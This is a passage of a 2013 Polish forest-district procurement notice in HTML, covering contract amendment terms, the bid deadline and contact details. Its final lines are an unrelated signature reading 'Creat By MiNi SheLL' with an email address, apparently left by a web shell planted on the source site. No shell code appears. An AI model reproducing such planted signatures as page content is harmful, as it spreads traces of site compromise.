W przypadku zaistnienia jednej z powyższych okoliczności dopuszcza się możliwość przedłużenia terminu realizacji przedmiotu umowy określonego w ofercie. Przedłużenie terminu zakończenia prac nastąpi w formie aneksu do umowy i wymaga pisemnego wniosku Wykonawcy wraz z uzasadnieniem, zaakceptowanego przez Zamawiającego. Przedłużenie terminu zakończenia prac nastąpi o okres niezbędny dla zakończenia prac uwzględniający okres wystąpienia czynników uniemożliwiających terminowe wykonanie przedmiotu umowy.
Zmiana osób realizujących zamówienie.
Zamawiający dopuszcza możliwość zmiany osób odpowiedzialnych za realizację zamówienia wymienionych w ofercie (wynikają z polityki kadrowej Wykonawcy) pod warunkiem przedłożenia przez Wykonawcę wraz z wnioskiem o w/w zmianę, dokumentów potwierdzających, że osoby które będą uczestniczyć w wykonaniu zamówienia posiadają kwalifikacje i uprawnienia równoważne (nie mniejsze) niż osoby wymienione w ofercie. Zmiany takie wymagają aneksu do umowy.
Zmiana wynagrodzenia umownego w zakresie wynikającym ze zmiany
obowiązującej stawki VAT Zamawiający ustala zmianę wynagrodzenia umownego w przypadku ustawowej zmiany stawki podatku od towarów i usług VAT. W przypadku zmiany stawki podatku VAT, cena netto za wykonanie przedmiotu umowy (części umowy) nie ulega zmianie, a wartość wynagrodzenia zostanie obliczona w oparciu o stawkę podatku VAT obowiązującą na dzień powstania obowiązku podatkowego.
Zmiana zakresu przedmiotu umowy w sprawie niniejszego zamówienia lub sposobu
wykonywania przedmiotu umowy, wraz ze skutkami wprowadzenia tej zmiany przy czym zmiana spowodowana może być okolicznościami zaistniałymi w trakcie realizacji przedmiotu umowy (zaistnienie warunków wpływających na zakres lub sposób wykonywania przedmiotu umowy:
a) wydanie przez właściwy organ decyzji administracyjnej wyłączającej lub ograniczającej przedmiot zamówienia opisany w specyfikacji istotnych warunków zamówienia, skutkującej niemożliwością uzyskania dla przedmiotu zamówienia pozwolenia na budowę.
b) ograniczenie przedmiotu zamówienia przez Zamawiającego wynikające z obiektywnych i uzasadnionych przyczyn, np. brak możliwości, pomimo prawidłowo przeprowadzonego postępowania, uzyskania uzgodnień i pozwoleń niezbędnych dla realizacji przedmiotu zamówienia, niewspółmiernie wysokie koszty w stosunku do standardowych, przyjęcia rozwiązań technicznych wynikających z uzyskanych opinii lub zezwoleń. W przypadku zmian zakresu umowy dopuszcza się możliwość zmiany wynagrodzenia Wykonawcy (obniżenia) w stopniu proporcjonalnym do zmiany zakresu przedmiotu umowy Zmiany wynagrodzenia możliwe są również gdy w  cenie ofertowej Wykonawca uwzględni koszty wykonania  raportu  oddziaływania  na  środowisko  a  ten  nie  będzie  wymagany  przez uprawnione do tego instytucje.
Uwaga: W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach. W takim przypadku Wykonawca może żądać wyłącznie wynagrodzenia z tytułu wykonanej części umowy.
Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może    wyrazić zgodę. Nie stanowią jednocześnie zobowiązania Zamawiającego wyrażenia takiej   zgody. Zmiany umowy są skuteczne, jeżeli zostaną wprowadzone z zachowaniem formy pisemnej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.radom.lasy.gov.pl/ostrowiec<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ostrowiec Świętokrzyski, Sudół 216, 27-400 Ostrowiec Św. Zapytania mogą być składane faksem pod numer: 41 2651429 lub na adres email: ostrowiec@radom.lasy.gov.pl..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.09.2013 godzina 10:00, miejsce: Nadleśnictwio Ostrowiec Świętokrzyski, Sudół 216, 27-400 Ostrowiec Św. pokój nr 5 (sekretariat)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com